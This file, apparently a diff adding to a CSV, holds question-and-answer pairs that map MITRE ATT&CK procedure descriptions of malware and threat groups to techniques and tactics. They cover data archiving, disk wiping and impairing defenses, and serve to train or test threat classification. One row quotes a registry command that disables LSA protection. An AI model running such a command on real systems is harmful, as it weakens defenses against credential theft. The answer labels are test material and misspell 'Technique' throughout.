+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has used a custom encryption algorithm to encrypt collected data.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D has used AES in CBC mode to encrypt collected data when saving that data to disk.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum has used a custom implementation of AES encryption to encrypt collected data.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OwaAuth DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RGDoor encrypts files with XOR before sending them back to the C2 server.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RawPOS encodes credit card data it collected from the victim with XOR.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reaver encrypts collected data with an incremental XOR key prior to exfiltration.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun can archive data using RC4 encryption and Base64 encoding prior to exfiltration.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Data SPACESHIP copies to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARDUMP has encrypted collected data using AES CBC mode and encoded it using Base64.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT has encrypted collected data with AES-256 using a hardcoded key.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has encrypted collected data using a XOR-based algorithm.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet encrypts exfiltrated data via C2 with static 31-byte long XOR keys.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: T9000 encrypts collected data using a single byte XOR key.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain has used XOR-based encryption for collected files before exfiltration.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used malware like WhiskeyAlfa to overwrite the first 64MB of every drive with a mix of static and random buffers. A similar process is then used to wipe content in logical drives and, finally, attempt to wipe every byte of every sector on every drive. WhiskeyBravo can be used to overwrite the first 4.9MB of physical drives. WhiskeyDelta can overwrite the first 132MB or 1.5MB of each drive with random data from heap memory.","Tecnique: T1561.001 Disk Wipe: Disk Content Wipe, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AcidRain iterates over device file identifiers on the target, opens the device file, and either overwrites the file or calls various IOCTLS commands to erase it.","Tecnique: T1561.001 Disk Wipe: Disk Content Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat has the ability to wipe VM snapshots on compromised networks.,"Tecnique: T1561.001 Disk Wipe: Disk Content Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper has the ability to corrupt disk partitions and obtain raw disk access to destroy data.,"Tecnique: T1561.001 Disk Wipe: Disk Content Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex can wipe deleted data from all drives using cipher.exe.,"Tecnique: T1561.001 Disk Wipe: Disk Content Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RawDisk has been used to directly access the hard disk to help overwrite arbitrarily sized portions of disk content.,"Tecnique: T1561.001 Disk Wipe: Disk Content Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill can wipe the accessible physical or logical drives of the infected machine.,"Tecnique: T1561.001 Disk Wipe: Disk Content Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can overwrite sectors of a victim host's hard drive at periodic offsets.,"Tecnique: T1561.001 Disk Wipe: Disk Content Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR).,"Tecnique: T1561.002 Disk Wipe: Disk Structure Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable.,"Tecnique: T1561.002 Disk Wipe: Disk Structure Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine and has possessed MBR wiper malware since at least 2009.,"Tecnique: T1561.002 Disk Wipe: Disk Structure Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used the BlackEnergy KillDisk component to corrupt the infected system's master boot record.,"Tecnique: T1561.002 Disk Wipe: Disk Structure Wipe, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CaddyWiper has the ability to destroy information about a physical drive's partitions including the MBR, GPT, and partition entries.","Tecnique: T1561.002 Disk Wipe: Disk Structure Wipe, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper has the ability to corrupt disk partitions, damage the Master Boot Record (MBR), and overwrite the Master File Table (MFT) of all available physical drives.","Tecnique: T1561.002 Disk Wipe: Disk Structure Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk overwrites the first sector of the Master Boot Record with “0x00”.,"Tecnique: T1561.002 Disk Wipe: Disk Structure Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RawDisk was used in Shamoon to help overwrite components of disk structure like the MBR and disk partitions.,"Tecnique: T1561.002 Disk Wipe: Disk Structure Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon has been seen overwriting features of disk structure such as the MBR.,"Tecnique: T1561.002 Disk Wipe: Disk Structure Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill can wipe the master boot record of an infected computer.,"Tecnique: T1561.002 Disk Wipe: Disk Structure Wipe, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can overwrite the Master Book Record (MBR) on victim systems with a malicious 16-bit bootloader.,"Tecnique: T1561.002 Disk Wipe: Disk Structure Wipe, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has disabled LSA protection on compromised hosts using `""reg"" add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f`.","Tecnique: T1562 Impair Defenses, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet reduces the integrity level of objects to allow write actions.,"Tecnique: T1562 Impair Defenses, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry internet settings to lower internet security.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors disabled logging and modified the `compcheckresult.cgi` component to edit the Ivanti Connect Secure built-in Integrity Checker exclusion list to evade detection.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors disabled anti-virus and anti-spyware tools in some instances on the victim’s machines. The actors also disabled proxy settings to allow direct communication from victims to the Internet.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used the service control manager on a remote system to disable services associated with security monitoring products.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools on compromised systems.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has incorporated code into several tools that attempts to terminate anti-virus processes.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has executed a batch script designed to disable Windows Defender on a compromised host.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has deployed a utility script named kill.bat to disable anti-virus.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has delivered macros which can tamper with Microsoft Office security settings.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the taskkill command.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider used PsExec to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has been observed turning off Windows Security Center and can hide the AV software window from the view of the infected user.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services..","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has disabled antivirus services on targeted systems in order to upload malicious payloads.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater can disable the system's local proxy settings.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malware used by Putter Panda attempts to terminate processes corresponding to two components of Sophos Anti-Virus (SAVAdminService.exe and SavService.exe).,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke used scripts which detected and uninstalled antivirus software.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has attempted to disable built-in security protections such as Windows AMSI.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used malware to disable Windows Defender.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used a AMSI bypass, which patches the in-memory amsi.dll, in PowerShell scripts to bypass Windows antimalware products.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has shut down or uninstalled security applications on victim systems that might prevent ransomware from executing.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has the capability to kill any running analysis processes and AV software.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon looks for and attempts to stop anti-malware solutions.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk can stop anti-virus services on a compromised host.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar has manually loaded ntdll from disk in order to identity and remove API hooks set by security products.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brave Prince terminates antimalware processes.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore can change browser security settings to enable extensions to be installed. Bundlore uses the pkill cfprefsd command to prevent users from inspecting processes.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ChChes can alter the victim's proxy configuration.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop can uninstall or disable security products.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike has the ability to use Smart Applet attacks to disable the Java SecurityManager sandbox.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker terminates various services related to system security and Windows.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet can disable Security Center functions like anti-virus.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate will terminate processes associated with several security software products if identified during execution.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol can attempt to stop security software.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut can patch Antimalware Scan Interface (AMSI), Windows Lockdown Policy (WLDP), as well as exit-related Native API functions to avoid process termination.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EKANS stops processes related to security and management software.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury can disable SELinux Role-Based Access Control and deactivate PAM modules.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has disabled Windows Defender to evade protections.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon terminates anti-malware processes if they’re found running on the system.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to disable Microsoft Outlook's security policies to disable macro warnings.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can hook APIs, kill processes, break file system paths, and change ACLs to prevent security tools from running.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 kills and disables services for Windows Security Center, and Windows Defender.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HDoor kills anti-virus found on the victim.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has modified DNS resolvers to evade DNS monitoring tools.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has a feature to disable Windows Task Manager.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can lower security settings by changing Registry keys.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LockerGoga installation has been immediately preceded by a ""task kill"" command in order to disable anti-virus.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg. It has also disabled Windows Defender's Real-Time Monitoring feature and attempted to disable endpoint protection services.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex was used to kill endpoint security processes.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has a function to kill processes associated with defenses and can prevent certain processes from launching.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can attempt to uninstall Kaspersky Antivirus or remove the Kaspersky license; it can also add all files and folders related to the attack to the Windows Defender exclusion list.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanHaiShu can change Internet Explorer settings to reduce warnings about malware activity.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore can modify the victim's anti-virus.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker can detect and terminate active security software-related processes on infected systems.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can disable Microsoft Office Protected View by changing Registry keys.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton kills security tools like Wireshark that are running.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa has the capability to stop antivirus services and disable Windows Defender.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has the ability to modify the Registry to add its binaries to the Windows Defender exclusion list.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can connect to and disable the Symantec server on the victim's network.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ragnar Locker has attempted to terminate/stop processes and services associated with endpoint security products.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RobbinHood will search for Windows services that are associated with antivirus software on the system and kill the process.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RunningRAT kills antimalware running process.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has stopped services related to anti-virus.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY's `amsiPatch.py` module can disable Antimalware Scan Interface (AMSI) functions.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST attempted to disable software security services following checks against a FNV-1a + XOR hashed hardcoded blocklist.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has the ability to set SELinux to permissive mode.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SslMM identifies and kills anti-malware processes.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can add directories used by the malware to the Windows Defender exclusions list to prevent detection.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest uses the function kill_unwanted to obtain a list of running processes and kills each process matching a list of security related processes.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyZBot can disable Avira anti-virus.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can disable Windows Defender.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Unknown Logger has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can disarm Windows Defender during the UAC process to evade detection.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can download and execute AdvancedRun.exe to disable the Windows Defender Theat Protection service and set an exclusion path for the C:\ drive.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIPLINE can add itself to the exclusion list for the Ivanti Connect Secure Integrity Checker Tool if the `--exclude` parameter is passed by the `tar` process.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can kill AV products' processes.,"Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: macOS.OSAMiner has searched for the Activity Monitor process in the System Events process list and kills the process if running. macOS.OSAMiner also searches the operating system's `install.log` for apps matching its hardcoded list, killing all matching process names.","Tecnique: T1562.001 Impair Defenses: Disable or Modify Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team disabled event logging on compromised systems.","Tecnique: T1562.002 Impair Defenses: Disable Windows Event Logging, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29, used `AUDITPOL` to prevent the collection of audit logs.","Tecnique: T1562.002 Impair Defenses: Disable Windows Event Logging, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has executed scripts to disable the event log service.,"Tecnique: T1562.002 Impair Defenses: Disable Windows Event Logging, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used appcmd.exe to disable logging on a victim server.,"Tecnique: T1562.002 Impair Defenses: Disable Windows Event Logging, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wevtutil can be used to disable specific event logs on the system.,"Tecnique: T1562.002 Impair Defenses: Disable Windows Event Logging, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has prepended a space to all of their terminal commands to operate without leaving traces in the HISTCONTROL environment.,"Tecnique: T1562.003 Impair Defenses: Impair Command History Logging, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can bypass ScriptBlock logging to execute unmanaged PowerShell code from memory.,"Tecnique: T1562.003 Impair Defenses: Impair Command History Logging, Tactic: TA0005 Defense Evasion"
